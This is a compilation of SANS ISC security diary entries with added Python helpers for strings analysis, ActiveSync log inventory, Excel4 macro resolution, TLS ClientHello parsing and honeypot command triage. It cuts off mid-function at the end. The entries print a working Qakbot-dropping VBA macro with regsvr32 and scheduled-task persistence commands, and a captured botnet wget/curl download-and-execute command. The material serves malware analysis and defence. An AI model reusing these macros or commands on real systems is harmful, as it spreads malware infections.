ISC Stormcast For Tuesday, September 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7690, (Tue, Sep 28th)
ISC Stormcast For Monday, September 27th, 2021 https://isc.sans.edu/podcastdetail.html?id=7688, (Mon, Sep 27th)
If you are interested in CyberChef, I have more CyberChef videos here.
Malware analysis is difficult.
But there is one method that everybody can follow, even without command-line skills: strings analysis.
Of course, there are many ways to make strings analysis impossible, by making the plaintext strings unreadable. Simple file compression is an example.
The malicious document from Xavier's diary entry "Excel Recipe: Some VBA Code with a Touch of Excel4 Macro" uses a sophisticated method: it combines VBA and Excel 4 macros to download Qakbot. Despite this complexity, strings analysis can be performed on this maldoc to find the URLs.
For this diary entry, I will analyze this maldoc with CyberChef:
First step: I add the maldoc as input:
Second step: I search for the strings operation:
Third step: I add the strings operation to the recipe:
If I browse through the output, I will find the URLs. But I want to automate that too.
Fourth step: I search for the regex operation:
Last step: I add the regex operation to the recipe, and configure it to use the built-in URL regex and to output matches only:
Now, these URLs are actually incomplete. The maldoc's script appends a path to these URLs: a timestamp terminated with ".dat".
But despite that, the IPv4 addresses we found here are good IOCs to get started.
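The same strings-then-URL-regex pipeline, reimplemented in Python as an added example (this is not code from the diary or from CyberChef; the URL and IPv4 patterns are my own and the binary blob SAMPLE_BLOB is constructed). It goes one step beyond the recipe above: it also pulls UTF-16LE strings, which single-byte strings analysis misses, and it extracts bare IPv4 addresses, which matters here because the URLs on disk are incomplete:

```python
import re

# Constructed sample blob standing in for a maldoc: binary bytes around an ASCII string,
# an ASCII URL, a UTF-16LE URL (Office files often store text that way) and a bare IPv4.
SAMPLE_BLOB = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8
    + b'Attribute VB_Name = "Module1"\x00\x00'
    + b"\x01\x02http://203.0.113.10/44461.9891568287.dat\x00"
    + b"\xff\xfe" + "https://198.51.100.7:8080/stage2.dat".encode("utf-16-le") + b"\x00\x00"
    + b"\x03ping 192.0.2.44\x00\x05\x06\x07"
)

# Patterns written for this example (assumptions; not CyberChef's built-in regexes).
URL_RE = re.compile(r"\b[a-z][a-z0-9+.\-]*://[^\s\"'<>]+", re.IGNORECASE)
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)


def extract_strings(blob, min_len=4):
    """Return printable runs of at least min_len characters, like the strings tool:
    single-byte ASCII runs first, then UTF-16LE runs (each character followed by NUL)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in utf16_re.finditer(blob)]
    return found


def _unique(items):
    """Deduplicate while keeping first-seen order."""
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def find_urls(blob):
    """Strings -> URL regex -> matches only: the CyberChef recipe from the diary."""
    hits = []
    for s in extract_strings(blob):
        hits += [m.group().rstrip(".,;)") for m in URL_RE.finditer(s)]
    return _unique(hits)


def find_ipv4(blob):
    """Same pipeline with an IPv4 pattern; useful when the URLs on disk are incomplete."""
    hits = []
    for s in extract_strings(blob):
        hits += IPV4_RE.findall(s)
    return _unique(hits)


def defang(indicator):
    """Render an indicator in the hxxp://1[.]2[.]3[.]4 style used in the diaries."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    for url in find_urls(SAMPLE_BLOB):
        print("URL :", defang(url))
    for ip in find_ipv4(SAMPLE_BLOB):
        print("IPv4:", defang(ip))
```

Run it against a real file with `find_urls(open(path, "rb").read())`; the minimum string length of 4 matches the default of the strings tool, and raising it cuts noise from short binary runs.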
Today, smartphones are everywhere and have become our best friends for many tasks. Your users probably already access their corporate mailbox via a mobile device; if it's not yet the case, you probably have many requests to implement this. There are two ways to achieve this. You can provide corporate devices to all users: from a risk perspective, it's the best solution, since you select the models and control them, but it's very expensive and people don't like to carry two devices (a personal and a corporate one). Fortunately, if you use a Microsoft Exchange platform, there are ways to authorize personal devices to access corporate emails with a software component called ActiveSync. ActiveSync allows deploying basic security policies like forcing the device to be locked with a password, enforcing a minimum password length, etc. However, it's not a real MDM ("Mobile Device Management").
But if you have hundreds or thousands of users connecting their mobile devices to your Exchange server, how do you keep an inventory of models, hardware, etc.? Especially if the system administrators are not ready to share some information with your security team? ActiveSync is based on open protocols: HTTP(S) and XML. To synchronize, the ActiveSync server must face the Internet like any web server. So it means we can gather some logs, either via a reverse proxy or directly on the IIS server running the ActiveSync service.
Because network data is a goldmine (you can learn this topic in FOR572 - "Advanced Network Forensics: Threat Hunting, Analysis, and Incident Response"), let's have a look at the IIS logs, located in C:\inetpub\logs\LogFiles\W3SVC1\*.log. Here is a sample HTTP request (the line is pretty long and has been beautified):
2021-09-20 12:10:46 192.168.4.101 POST /Microsoft-Server-ActiveSync/default.eas \
  Cmd=Ping&User=domain.test%5Cuser01&DeviceId=XXXXXXXX&DeviceType=SamsungDevice& \
  CorrelationID=<empty>;&ClientId=XXXXXXXXX&cafeReqId=817b3ec9-6360-4526-a738-xxxxxxxxxxxx; \
  443 domain.test\user01 10.0.0.11 Android-SAMSUNG-SM-G950F/101.9 - 200 0 0 609
One of the interesting fields is the User-Agent (like in any HTTP request), but the ActiveSync client submits the device model, OS and version through this field! Here are some User-Agent strings:
Android-LG-G810/9.10.11
Android-SAMSUNG-SM-A505FN/101.10
Apple-iPad5C3/1807.82
Apple-iPhone10C4/1807.69
Apple-iPhone13C4/1807.82
Wait, did you read the last sample carefully? Does it mean that some users are already happy owners of a brand new iPhone 13? Unfortunately, it's not so easy! The ActiveSync User-Agent does not reflect the model "in clear". It contains a reference to a model and you must convert it to the right device name. Example with "Apple-iPhone10C4/1807.82":
"iPhone 10C4" = "iPhone 8"
"1807.69" = "iOS 14.7"
How do we find the corresponding values? There are plenty of lists available online, like this one for iOS.
Now, you have all the requirements to build an inventory of all the mobile devices connecting to your ActiveSync instance and learn about:
- Outdated devices
- Suspicious devices (based on models not sold in Europe or your region)
- People using multiple devices (because we also have the username in the HTTP event log)
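An added example (not the diary's code) of building that inventory from the IIS logs in Python: it reads the #Fields header, keeps only ActiveSync requests, decodes the User-Agent, and keys the inventory on user and DeviceId so that users with several devices stand out. SAMPLE_LOG is a constructed excerpt in the layout of the request above, and the MODEL_NAMES/OS_VERSIONS tables hold only the two conversions given in this diary; you would extend them from one of the public lists.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (all values made up for this example). The field order is
# the one seen in the diary's sample request; IIS writes the #Fields directive itself.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-09-20 12:10:46 192.168.4.101 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Ping&User=domain.test%5Cuser01&DeviceId=DEV0001&DeviceType=SamsungDevice 443 domain.test\\user01 10.0.0.11 Android-SAMSUNG-SM-G950F/101.9 - 200 0 0 609
2021-09-20 12:11:02 192.168.4.101 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Sync&User=domain.test%5Cuser02&DeviceId=DEV0002&DeviceType=iPhone 443 domain.test\\user02 10.0.0.12 Apple-iPhone10C4/1807.69 - 200 0 0 120
2021-09-20 12:11:30 192.168.4.101 POST /Microsoft-Server-ActiveSync/default.eas Cmd=Ping&User=domain.test%5Cuser02&DeviceId=DEV0003&DeviceType=SamsungDevice 443 domain.test\\user02 10.0.0.13 Android-SAMSUNG-SM-A505FN/101.10 - 200 0 0 700
2021-09-20 12:12:00 192.168.4.101 GET /owa/ - 443 domain.test\\user03 10.0.0.14 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 30
"""

# Reference tables: only the two conversions given in the diary; extend from a public list.
MODEL_NAMES = {"iPhone10C4": "iPhone 8"}
OS_VERSIONS = {"1807.69": "iOS 14.7"}

UA_RE = re.compile(r"^([^-]+)-([^/]+)/(\S+)$")   # platform-model/version


def parse_iis_log(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields directive."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or unexpected layout: skip rather than mis-assign columns
        records.append(dict(zip(fields, values)))
    return records


def decode_user_agent(ua):
    """Split an ActiveSync User-Agent and map the model/version codes where we know them."""
    m = UA_RE.match(ua)
    if not m:
        return {"platform": "?", "model_code": ua, "model": ua, "os_version": "?"}
    platform, model, version = m.groups()
    return {
        "platform": platform,
        "model_code": model,
        "model": MODEL_NAMES.get(model, model),
        "os_version": OS_VERSIONS.get(version, version),
    }


def activesync_inventory(records):
    """One entry per (user, DeviceId) with model, OS, client IPs and request count."""
    inventory = {}
    for rec in records:
        if not rec["cs-uri-stem"].lower().startswith("/microsoft-server-activesync"):
            continue
        query = parse_qs(rec["cs-uri-query"])
        user = query.get("User", [rec["cs-username"]])[0]
        device_id = query.get("DeviceId", ["unknown"])[0]
        entry = inventory.setdefault((user, device_id), {
            **decode_user_agent(rec["cs(User-Agent)"]),
            "device_type": query.get("DeviceType", ["?"])[0],
            "client_ips": set(),
            "requests": 0,
            "last_seen": "",
        })
        entry["client_ips"].add(rec["c-ip"])
        entry["requests"] += 1
        entry["last_seen"] = max(entry["last_seen"], rec["date"] + " " + rec["time"])
    return inventory


def users_with_multiple_devices(inventory):
    """Users seen with more than one DeviceId (the third bullet above)."""
    per_user = {}
    for (user, device_id) in inventory:
        per_user.setdefault(user, []).append(device_id)
    return {u: sorted(d) for u, d in per_user.items() if len(d) > 1}


if __name__ == "__main__":
    inv = activesync_inventory(parse_iis_log(SAMPLE_LOG))
    for (user, device_id), e in sorted(inv.items()):
        print(f"{user:22} {device_id:8} {e['model']:20} {e['os_version']:10} "
              f"{e['requests']} req, last {e['last_seen']}")
    print("multiple devices:", users_with_multiple_devices(inv))
```

Reading the #Fields directive instead of hard-coding column positions is what keeps this working across servers, since administrators can change the logged fields in IIS; outdated-OS and unexpected-model checks are then simple filters over the inventory's os_version and model_code values.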
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Friday, September 24th, 2021 https://isc.sans.edu/podcastdetail.html?id=7686, (Fri, Sep 24th)
ISC Stormcast For Thursday, September 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7684, (Thu, Sep 23rd)
Microsoft Excel supports two types of macros. The legacy format is known as “Excel4 macro” and the new one (already in use for a while) is based on VBA. We have already covered both formats in many diaries. Yesterday, I spotted an interesting sample that implements… both!
The malicious file was delivered through a classic phishing email and is called “Document_195004540-Copy.xls” (SHA256:4f4e67dccb3dfc213fac91d34d53d83be9b9f97c0b75fbbce8a6d24f26549e14). The file is unknown on VT at this time. It looks like a classic trap:
The document contains some VBA code:
remnux@remnux:/MalwareZoo/20210922$ oledump.py Document_195004540-Copy.xls
  1:       103 '\x01CompObj'
  2:       240 '\x05DocumentSummaryInformation'
  3:       208 '\x05SummaryInformation'
  4:    180804 'Workbook'
  5:       597 '_VBA_PROJECT_CUR/PROJECT'
  6:       116 '_VBA_PROJECT_CUR/PROJECTwm'
  7:        97 '_VBA_PROJECT_CUR/UserForm1/\x01CompObj'
  8:       301 '_VBA_PROJECT_CUR/UserForm1/\x03VBFrame'
  9:       226 '_VBA_PROJECT_CUR/UserForm1/f'
 10:       272 '_VBA_PROJECT_CUR/UserForm1/o'
 11: M    3768 '_VBA_PROJECT_CUR/VBA/Module1'
 12: m     991 '_VBA_PROJECT_CUR/VBA/Sheet1'
 13: M    3010 '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
 14: m    1195 '_VBA_PROJECT_CUR/VBA/UserForm1'
 15:      3860 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
 16:      2004 '_VBA_PROJECT_CUR/VBA/__SRP_0'
 17:       138 '_VBA_PROJECT_CUR/VBA/__SRP_1'
 18:       212 '_VBA_PROJECT_CUR/VBA/__SRP_2'
 19:       206 '_VBA_PROJECT_CUR/VBA/__SRP_3'
 20:       864 '_VBA_PROJECT_CUR/VBA/dir'
Here is the interesting macro (stream 11):
remnux@remnux:/MalwareZoo/20210922$ oledump.py Document_195004540-Copy.xls -s 11 -v
Attribute VB_Name = "Module1"
Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Sheet3"
    Sheets("Sheet3").Visible = False
    Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite
    Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
    Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption
    Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption
    Sheets("Sheet3").Range("K17") = "=NOW()"
    Sheets("Sheet3").Range("K18") = ".dat"
    Sheets("Sheet3").Range("H35") = "=HALT()"
    Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
    Sheets("Sheet3").Range("I10") = UserForm1.Caption
    Sheets("Sheet3").Range("I11") = "JJCCBB"
    Sheets("Sheet3").Range("I12") = "Byukilos"
    Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
    Sheets("Sheet3").Range("G11") = "..\Xertis1.dll"
    Sheets("Sheet3").Range("G12") = "..\Xertis2.dll"
    Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
    Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
    Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
    Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
    Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
    Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
    Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
    Sheets("Sheet3").Range("H18") = "=EXEC(I18)"
    Sheets("Sheet3").Range("H19") = "=EXEC(I19)"
    Application.Run Sheets("Sheet3").Range("H1")
End Sub
Sub auto_close()
    On Error Resume Next
    Application.ScreenUpdating = True
    Application.DisplayAlerts = False
    Sheets("Sheet3").Delete
    Application.DisplayAlerts = True
End Sub
First, the attacker wrote some “good” code: a new sheet ("Sheet3") is created and, when the document is closed, the sheet is removed again (via the auto_close() function)!
The magic line is this one:
Set Fera = Excel4IntlMacroSheets
See the Microsoft documentation. An Excel4 macro is injected into the created sheet and executed. What does it do?
It downloads the second stage payload from three different URLs (stored in a form):
hxxp://45[.]153[.]242[.]159/44461.9891568287.dat
hxxp://188[.]165[.]62[.]61/44461.9891568287.dat
hxxp://185[.]198[.]57[.]109/44461.9891568287.dat
The downloaded file is called Xertis.dll (SHA256:b8b8895cdf37dba76f9966ec100ac85cc0f70dfd79f09a175454b5062d21c25d) and is again unknown on VT. This is a DLL that is loaded into the system via this command:
regsvr32 -silent ..\Xertis.dll
Persistence is implemented via a scheduled task:
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn wxhfetombc /tr "regsvr32.exe -s \"C:\Users\user01\Xertis.dll\"" /SC ONCE /Z /ST 23:45 /ET 23:57
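As an added example (not from the diary), a small resolver that reads the Range() assignments from the macro above, follows the cell references and the & concatenations, and shows what each Excel4 formula actually evaluates to; values only known at runtime (the form captions holding the URLs, =NOW()) are kept as placeholders. MACRO is an excerpt of the stream 11 listing; the assignment and cell-reference patterns are mine.

```python
import re

# Excerpt of the auto_open() macro from the diary (stream 11), used as input.
MACRO = r'''
Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet3").Range("K17") = "=NOW()"
Sheets("Sheet3").Range("K18") = ".dat"
Sheets("Sheet3").Range("H35") = "=HALT()"
Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet3").Range("I10") = UserForm1.Caption
Sheets("Sheet3").Range("I11") = "JJCCBB"
Sheets("Sheet3").Range("I12") = "Byukilos"
Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
'''

ASSIGN_RE = re.compile(r'Sheets\("(\w+)"\)\.Range\("([A-Z]+\d+)"\)\s*=\s*(.+)$')
CELL_RE = re.compile(r"\b[A-Z]{1,3}\d{1,4}\b")
RUNTIME_RE = re.compile(r"[A-Z]+\(\)")           # =NOW(), =HALT(): no static value
DANGEROUS = ("EXEC(", "REGISTER(", "CALL(")       # Excel4 functions worth reading first


def parse_cells(macro):
    """Collect the Range("X") = value assignments into a cell -> value map."""
    cells = {}
    for line in macro.splitlines():
        m = ASSIGN_RE.search(line.strip())
        if not m:
            continue
        _sheet, cell, rhs = m.groups()
        rhs = rhs.strip()
        if rhs.startswith('"') and rhs.endswith('"'):
            cells[cell] = rhs[1:-1]        # literal; may itself be an Excel4 formula
        else:
            cells[cell] = f"<{rhs}>"       # e.g. a UserForm caption we can't see statically
    return cells


def resolve(cells, cell, depth=0):
    """Expand a cell's value: substitute referenced cells and join & concatenations."""
    value = cells.get(cell)
    if value is None:
        return ""                          # an empty cell concatenates to nothing (J10 here)
    if depth > 10 or not value.startswith("="):
        return value
    body = value[1:]
    if RUNTIME_RE.fullmatch(body):
        return f"<{body}>"                 # keep =NOW() as a placeholder
    expanded = CELL_RE.sub(lambda m: resolve(cells, m.group(), depth + 1), body)
    return "=" + expanded.replace("&", "")   # '&' only occurs as the concat operator here


def suspicious_formulas(cells):
    """Resolved formulas that register or run something, sorted by cell."""
    out = []
    for cell, value in cells.items():
        if value.startswith("=") and value[1:].upper().startswith(DANGEROUS):
            out.append((cell, resolve(cells, cell)))
    return sorted(out)


if __name__ == "__main__":
    table = parse_cells(MACRO)
    for cell in ("H9", "H10", "H17"):
        print(f"{cell}: {resolve(table, cell)}")
    print(suspicious_formulas(table))
```

Resolving H10 this way makes the URL construction visible: the form caption, the =NOW() serial and ".dat" are concatenated into the download path, which is why the URLs recovered by strings analysis end at the host.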
Once I infected my lab, the following C2 traffic was generated:
It’s a Qakbot sample...
The VBA macro was not obfuscated but the idea of mixing VBA with Excel4 was pretty clever to defeat many hunting rules.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
A Twitter follower sent me a link to an interesting maldoc on Malware Bazaar (thanks).
It's a Word document (OOXML) that exploits vulnerability %%CVE:2021-40444%%.
If you follow the steps of my diary entry "Simple Analysis Of A CVE-2021-40444 .docx Document" you will not find an unusual URL. I'll explain why in this diary entry.
This is the content of the maldoc (using my tool zipdump.py):
Let's look into the documents.xml.rels file:
Here you see many numeric character references in this XML file, like &#109;. This particular numeric character reference represents the letter m (ASCII 109).
We can use my tool numbers-to-string.py to convert these numbers to their corresponding character, like this:
And then we see the URL.
My xmldump.py tool converts these numeric character references too; that is another method to deobfuscate:
Now, let's come back to the output of zipdump:
Remark that the timestamps vary: some of them are 1980-01-01 00:00:00, and others are 2021-09-16.
When Office applications create an OOXML file, they do not encode the current time into the ZIP container's records; they use 1980-01-01 00:00:00, whereas ZIP tools will use the current time.
So this maldoc has most likely been created with Word, and has then been edited with another tool. This might well be one of the maldoc generator tools that have been released for CVE-2021-40444.
ISC Stormcast For Wednesday, September 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7682, (Wed, Sep 22nd)
One of the notable additions to iOS 15, which was officially released yesterday, is its "Private Relay" feature. Unlike a "simple" VPN, Private Relay appears to be more of a proxy service for HTTP, and it uses two hops operated by distinct entities so that no single entity becomes the new single point of privacy failure.
An "Apple+" subscription is required to use Private Relay. All connections are authenticated with Apple. Apple states that it has some anti-abuse features in place but only mentions rate limiting as one specific feature. Unlike most VPN services, Apple publishes a list of its egress IP addresses, including the geolocation assigned to them. It does not appear to be possible to alter your geolocation using Private Relay; one setting allows for "more relaxed" location matching. Many people sign up for VPN services to watch content designated for a particular location. Apple's Private Relay does not appear to support this use case.
So, in short, Apple focuses on privacy with its Private Relay. Private Relay appears to be limited to HTTP(S) traffic; applications not using HTTP(S) do not appear to use it. As a test, I used the "Speedtest" application from Ookla, and it still displayed my actual ISP.
Each Private Relay egress point uses an IPv4 and an IPv6 address. Even if your network is IPv4 only, you will be able to connect to IPv6 resources. This confused me at first, as my home network does not use IPv6 right now, and I still appeared to use an IPv6 address. My first guess was that some traffic still used the IPv6 address provided by the cell phone interface, but I ruled that out by disabling the cell phone interface. If LTE/5G is used, the IPv6 address used is Apple's and not the ISP's. So both IPv4 and IPv6 addresses are anonymized.
After enabling Private Relay (Settings->iCloud->Private Relay), you will see the following DNS requests/responses for mask.icloud.com (A records and an HTTPS RR [Type 56]). The IP address I got for mask.icloud.com was in the 184.108.40.206/17 network, a network owned by Apple, but not its usual 17/8 network.
The connection to the relay uses QUIC to port 443/UDP and TLS 1.3. The client hello includes the server name extension and the server name "mask.icloud.com." Only 3 cipher suites are offered (TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256). The server ends up selecting the AES128 suite. Application Layer Protocol Negotiation (ALPN) is also used, with unsurprisingly HTTP/3 being the only option.
The HTTPS RR is interesting. It is not yet finalized as an RFC as far as I know, but I have seen it pop up occasionally. For mask.icloud.com, I did not get a response for the HTTPS RR; maybe it will show up in the future. The idea is that part of the ALPN negotiation will happen via DNS. HTTPS RR is a performance feature, but it can also be used for Encrypted Client Hello (ECH), which is supposed to replace the respective TXT records that have been used in the past to encrypt the server name option.
So in short:
- Does "Private Relay" replace VPNs: No. Private Relay appears only to encrypt/anonymize HTTP(S) traffic. Some Apps may still reveal your actual IP address. But as far as Safari goes, it works like a VPN. You are also not able to appear in a different location.
- Can you block the use of "Private Relay" in a corporate network: Yes. Overwrite/block DNS requests for mask.icloud.com and mask-h2.icloud.com (I didn't see the second hostname, but "Private Relay" may use it per Apple's documentation)
- Can I block people from using "Private Relay" to access my site: Yes. You would need to block Apple's long list of egress points. But there appears to be little point in blocking them.
- Are websites still able to track me? Yes and no. Websites usually do not rely on the IP address to track you but on cookies and other browser features. Private Relay only hides your IP address. It solves the "last mile" privacy issue of ISPs tracking your behavior.
Private Relay does offer some additional privacy protections. It is a bit less than a "real" VPN, but close to it and easier to use. (plus free if you already have iCloud+).
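An added example (not Apple's or the diary's code) that builds a ClientHello handshake message with the fields described above and parses the SNI, ALPN list, offered cipher suites and supported versions back out of it. The same parser can be pointed at a captured hello once the QUIC Initial packet has been decrypted (Wireshark does this for Initial packets, whose keys derive from the connection ID); is_private_relay_hello() then applies the two hostnames from the summary list as the policy check. RELAY_HOSTS, the zeroed random and the constructed hello are the assumptions here.

```python
import struct

CIPHER_NAMES = {
    0x1301: "TLS_AES_128_GCM_SHA256",
    0x1302: "TLS_AES_256_GCM_SHA384",
    0x1303: "TLS_CHACHA20_POLY1305_SHA256",
}
EXT_SERVER_NAME, EXT_ALPN, EXT_SUPPORTED_VERSIONS = 0x0000, 0x0010, 0x002B
RELAY_HOSTS = {"mask.icloud.com", "mask-h2.icloud.com"}   # names from the diary


def _ext(ext_type, data):
    """TLS extension: 2-byte type, 2-byte length, payload."""
    return struct.pack("!HH", ext_type, len(data)) + data


def build_client_hello(server_name, cipher_suites, alpn):
    """Constructed TLS 1.3 ClientHello handshake message (what the QUIC CRYPTO frames carry,
    without a record layer). The random is zeroed: this is test input, not a real capture."""
    name = server_name.encode()
    sni = struct.pack("!HBH", len(name) + 3, 0, len(name)) + name    # list len, host_name type, name
    alpn_list = b"".join(bytes([len(p)]) + p.encode() for p in alpn)
    versions = bytes([2]) + struct.pack("!H", 0x0304)                  # TLS 1.3 only
    exts = (_ext(EXT_SERVER_NAME, sni)
            + _ext(EXT_SUPPORTED_VERSIONS, versions)
            + _ext(EXT_ALPN, struct.pack("!H", len(alpn_list)) + alpn_list))
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (struct.pack("!H", 0x0303) + bytes(32)          # legacy_version, random
            + bytes([0])                                    # legacy_session_id: empty
            + struct.pack("!H", len(suites)) + suites
            + bytes([1, 0])                                 # compression_methods: null only
            + struct.pack("!H", len(exts)) + exts)
    return bytes([0x01]) + len(body).to_bytes(3, "big") + body


def parse_client_hello(msg):
    """Pull SNI, ALPN, offered cipher suites and supported versions out of a ClientHello."""
    if msg[0] != 0x01:
        raise ValueError("not a ClientHello handshake message")
    body = msg[4:4 + int.from_bytes(msg[1:4], "big")]
    pos = 2 + 32                                            # skip legacy_version + random
    pos += 1 + body[pos]                                    # legacy_session_id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", body[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                                    # compression_methods
    ext_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    end = pos + ext_len
    info = {"sni": None, "alpn": [], "versions": [],
            "cipher_suites": [CIPHER_NAMES.get(s, f"0x{s:04x}") for s in suites]}
    while pos + 4 <= end:
        ext_type, elen = struct.unpack("!HH", body[pos:pos + 4])
        data = body[pos + 4:pos + 4 + elen]
        pos += 4 + elen
        if ext_type == EXT_SERVER_NAME:
            name_len = struct.unpack("!H", data[3:5])[0]   # after list len (2) + name type (1)
            info["sni"] = data[5:5 + name_len].decode()
        elif ext_type == EXT_ALPN:
            p = 2                                           # skip the list length
            while p < len(data):
                n = data[p]
                info["alpn"].append(data[p + 1:p + 1 + n].decode())
                p += 1 + n
        elif ext_type == EXT_SUPPORTED_VERSIONS:
            info["versions"] = [struct.unpack("!H", data[i:i + 2])[0]
                                for i in range(1, 1 + data[0], 2)]
    return info


def is_private_relay_hello(info):
    """Policy hook: the relay connection is recognisable by its SNI alone."""
    return info["sni"] in RELAY_HOSTS


if __name__ == "__main__":
    hello = build_client_hello("mask.icloud.com", [0x1301, 0x1302, 0x1303], ["h3"])
    print(parse_client_hello(hello), is_private_relay_hello(parse_client_hello(hello)))
```

The SNI is the only plaintext field that identifies the relay here, which is also why the ECH mechanism mentioned above matters: once the server name is encrypted, a DNS-level control on the two hostnames is the remaining practical option.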
ISC Stormcast For Tuesday, September 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7680, (Tue, Sep 21st)
#OMIGOD Exploits Captured in the Wild. Researchers responsible for half of scans for related ports., (Mon, Sep 20th)
After the "OMIGOD" vulnerability details were made public, and it became obvious that exploiting vulnerable hosts would be trivial, researchers and attackers started scanning for vulnerable hosts pretty much immediately. We saw a quick rise of scans, particularly against %%port:1270%%.
Some of the attacks originated from research projects that apparently enumerated vulnerable hosts. Scans we have linked to researchers appear so far to scan for the open port and do not send any specific attack payload. But we also see "genuine" exploits of the vulnerability. Azure is probably the most target-rich environment, with more than half of all hosts running Linux. Many of them have the Open Management Interface (OMI) software pre-installed by default. Azure is also leaving it up to the users to patch this software that they may not know is installed. Our data comes from our honeypot network, which is not specifically covering Azure so far. The OMI software may also be installed outside of Azure. It makes sense for attackers to scan the entire internet as hosts outside of Azure may not consider themselves vulnerable.
One exploit that just hit our honeypot (formatted for easier readability)
At this point, all of the exploits we have seen appear to test the vulnerability and do not (yet?) deploy any actual payloads. Others have observed some "Mirai" style payloads being deployed.
Here are the most common commands we see executed (sometimes, the command is Base64 encoded):
wget -O lolol.sh http://220.127.116.11/lolol.sh; curl -o lolol.sh http://18.104.22.168/lolol.sh; chmod 777 lolol.sh; sh lolol.sh
This is a typical botnet propagation command. At the time I looked for it, the lolol.sh script was no longer available, and the URL returned a 404 error.
I have seen the same command against the other ports associated with "OMI," using different 'test' URLs. The URL is not reachable. Note how the IP is the same as above.
In addition, I have seen some simple requests using "id" or "whoami," typical checks if the vulnerability is exploitable.
Interestingly, I have seen only one IP in our honeypots for the 'wget' or 'curl' commands, but the requests originated from 125 different source IPs just today alone. This appears to be one botnet, and I guess that right now, they are just looking for vulnerable systems (hitting the above URL would prove you to be vulnerable).
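An added example (not ISC honeypot code) of triaging captured commands the way this diary does by hand: decode base64 if present, split the pipeline into stages, classify it as recon or download-and-execute, and pull the download hosts out as IOCs. SAMPLE_COMMANDS holds the propagation command quoted above plus two constructed entries (a base64-encoded "whoami" and a bare "id"); the verb lists are my own.

```python
import base64
import binascii
import re
import shlex

URL_RE = re.compile(r"https?://[^\s;'\"|&]+")
RECON_VERBS = {"id", "whoami"}                  # the checks mentioned in the diary
DOWNLOADERS = {"wget", "curl"}
RUNNERS = {"sh", "bash", "chmod"}

# Constructed honeypot captures: the command quoted in the diary, base64("whoami"), and "id".
SAMPLE_COMMANDS = [
    "wget -O lolol.sh http://220.127.116.11/lolol.sh; curl -o lolol.sh http://18.104.22.168/lolol.sh; chmod 777 lolol.sh; sh lolol.sh",
    "d2hvYW1p",
    "id",
]


def maybe_base64(cmd):
    """Decode a bare base64 blob to text; anything else comes back unchanged."""
    s = cmd.strip()
    if not re.fullmatch(r"[A-Za-z0-9+/]{8,}={0,2}", s):
        return cmd
    try:
        decoded = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return cmd
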